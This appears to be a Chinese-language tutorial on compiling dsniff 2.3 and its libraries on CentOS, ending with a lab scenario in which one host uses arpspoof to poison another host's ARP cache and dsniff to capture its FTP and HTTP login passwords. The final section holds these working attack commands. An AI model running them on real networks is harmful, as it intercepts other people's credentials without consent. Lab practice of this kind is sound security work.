wget:
http://www.3est.com/linux/openssl-0.9.7i.tar.gz
http://www.3est.com/linux/libnids-1.18.tar.gz
http://www.3est.com/linux/libpcap-0.7.2.tar.gz
http://www.3est.com/linux/libnet-1.0.2a.tar.gz
http://www.3est.com/linux/db-4.7.25.tar.gz
http://www.3est.com/linux/dsniff-2.3.tar.gz
一、安装gcc
# yum -y install gcc
二、安装openssl
# tar zxvf openssl-0.9.7i.tar.gz
# cd openssl-0.9.7i
# ./config
# make
# make install
三、安装flex 和 bison
# yum -y install flex
# yum -y install bison
四、安装libpcap
# tar zxvf libpcap-0.7.2.tar.gz
# cd libpcap-0.7.2
# ./configure
# make
# make install
五、安装libnet
# tar zxvf libnet-1.0.2a.tar.gz
# cd Libnet-1.0.2a
# ./configure
# make
# make install
六、安装libnids
# tar zxvf libnids-1.18.tar.gz
# cd libnids-1.18
# ./configure
# make
# make install
七、安装BerkeleyDB
# tar zxvf db-4.7.25.tar.gz
# cd db-4.7.25/build_unix
# ../dist/configure --enable-compat185
# make
# make install
八、安装dsniff
# tar zxvf dsniff-2.3.tar.gz
# cd dsniff-2.3
# vi arp.c
加入 #include "memory.h"
# ./configure --enable-compat185 --with-db=/usr/local/BerkeleyDB.4.7
# make
# make install
九、其它设置
# vi /etc/sysctl.conf
修改 net.ipv4.ip_forward = 1
# sysctl -p
十、使用dsniff
# cp /usr/local/BerkeleyDB.4.7/lib/libdb-4.7.so /usr/lib
# cd /usr/local/sbin;ls
# ./dsniff --help
环境:
网关--> 192.168.0.1
A --> 192.168.0.123(CentOS+dsniff-2.3)
B --> 192.168.0.125(Cent0S)
目的:
使用 A 嗅探 B 的FTP、http登录密码
1. 使用 arpspoof 对目标机实施ARP欺骗攻击
# arpspoof -i eth0 -t 192.168.0.125 192.168.0.1
2. 使用 dsniff 取得指定端口的数据信息
# dsniff -i eth0 -t 21/tcp=ftp,80/tcp=http
Dsniff支持的协议类型包括:
FTP,Telnet,SMTP,HTTP,POP,NNTP,IMAP,SNMP,LDAP,Rlogin,RIP,OSP
F,PPTP,MS-CHAP,NFS,VRRP,YP/NIS,SOCKS,X11,CVS,IRC,AIM,ICQ,Napster,ostgreSQL,Meeting Maker,Citrix ICA,Symantec,pcAnywhere,NA
I Sniffer,Microsoft SMB,Oracle QL*Net,Sybase及Microsoft SQL认证信息